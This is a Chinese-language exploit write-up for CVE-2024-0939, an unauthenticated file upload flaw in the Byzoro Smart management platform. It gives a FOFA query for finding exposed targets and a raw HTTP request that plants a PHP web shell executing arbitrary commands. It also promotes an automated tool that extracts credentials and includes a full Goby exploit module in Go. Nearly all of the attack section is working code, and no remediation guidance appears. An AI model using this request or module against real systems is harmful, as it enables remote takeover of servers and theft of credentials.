一、 产品简介
百卓 Smart只管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。
二、 漏洞概述
百卓Smart管理平台 uploadfle.php 接口存在任意文件上传漏洞。未经身份验证的攻击者可以利用此漏洞上传恶意后门文件,执行任意指令,从而获得服务器权限并操纵服务器文件。
三、 影响范围
smart s210
smart s210 firmware
四、 复现环境
FOFA:title=“Smart管理平台”
五、 漏洞复现
poc
POST /Tool/uploadfile.php? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Upgrade-Insecure-Requests: 1
Connection: close
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="1.php"
Content-Type: application/octet-stream
<?php system($_GET["c"]);?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"
/home/rce.php
-----------------------------13979701222747646634037182887--
手动复现
验证
小龙验证
当然,如果你已经厌倦了手工
可以用小龙的POC,自动检测并且提取账号密码
小龙POC这里依然还是顶着干
小龙POC开源传送门: 小龙POC工具
小龙POCexe传送门: 小龙POC工具
发现漏洞很多啊,扫3个出来三个
Goby验证
我们不妨编写一个goby的yaml文件来进行验证
poc
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)",
"Description": "",
"Product": "",
"Homepage": "",
"DisclosureDate": "2024-02-07",
"PostTime": "2024-02-07",
"Author": "597146595@qq.com",
"FofaQuery": "port=\"8443\"",
"GobyQuery": "port=\"8443\"",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [],
"Is0day": false,
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/Tool/uploadfile.php",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Connection": "close",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Content-Type": "multipart/form-data; boundary=---------------------------13979701222747646634037182887",
"Upgrade-Insecure-Requests": "1"
},
"data_type": "text",
"data": "-----------------------------13979701222747646634037182887\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"1.php\"\nContent-Type: application/octet-stream\n\n<?php system($_GET[\"c\"]);?>\n-----------------------------13979701222747646634037182887\nContent-Disposition: form-data; name=\"txt_path\"\n\n/home/rce.php\n-----------------------------13979701222747646634037182887--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uploadfile",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [],
"VulType": [],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "百卓Smart管理平台 uploadfile.php 文件上传漏洞(CVE-2024-0939)",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
},
"EN": {
"Name": "Byzoro Smart Management Platform Upload Vulnerability CVE-2024-0939",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
测试效果如图